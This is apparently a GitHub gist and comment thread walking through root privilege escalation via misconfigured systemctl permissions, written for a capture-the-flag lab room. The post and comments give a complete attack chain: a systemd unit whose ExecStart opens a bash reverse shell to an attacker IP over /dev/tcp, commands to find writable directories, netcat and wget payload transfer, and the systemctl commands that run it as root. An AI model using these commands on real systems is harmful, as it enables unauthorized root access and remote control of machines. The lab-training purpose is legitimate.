Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

Privilege Escalation.md

For better reading experience

https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find a files/directories that writable

find / -type f -maxdepth 2 -writable

or

find / -type d -maxdepth 2 -writable

2. Transfter the payload(Or just write file there using vi)

Init the target listening the port

nc -vl 44444 > root.service

Send file to traget

nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service

/bin/systemctl start root

5. The nc listening on 9999 would give you the root

Appreicaite for following or star on my GitHub

• https://github.com/A1vinSmith

Cheers

Expand Knowlege

https://gtfobins.github.io/gtfobins/systemctl/#suid

https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory

https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

perfect

Don't you think that find command should be find -type d instead of find -type f?

Don't you think that find command should be find -type d instead of find -type f?

Yeah, couldn’t remember it’s for files or directory. Would be type d if looking for latter one. Thank you for pointing out.

Vulnversity :)

It's better to use find to find all writable directories in the system and hence use:
find / -type d -maxdepth 2 -writable

froget about all that file transferring

START LISTENER (9999)

find / -type d -maxdepth 2 -writable

-CD to writable dir-

-One liner -
RATME="'bash -i >& /dev/tcp/yourIPHere/9999 0>&1'" echo '[Unit]\nDescription=rooted-Oneliner\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c '$RATME'\n\n[Install]\nWantedBy=multi-user.target' >root.service

-Start-
/bin/systemctl enable /whatever-writable-dir/root.service
/bin/systemctl start root

Just finished thm-vulnversity. I just found out that nc can transfer file. Before, I write the payload manually on victim machine with very slowly and patienly.

Who is here for the vulnervisity room?

Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then wget it in the reverse shell you already got.

---

Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell, and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)

Voila!

The man, ty

it works , ty

Try this one too:

https://gtfobins.github.io/gtfobins/systemctl/

vulnervisity room, if you already have an open shell, just use the same ip and port for root.service as your shell, and just reconnect.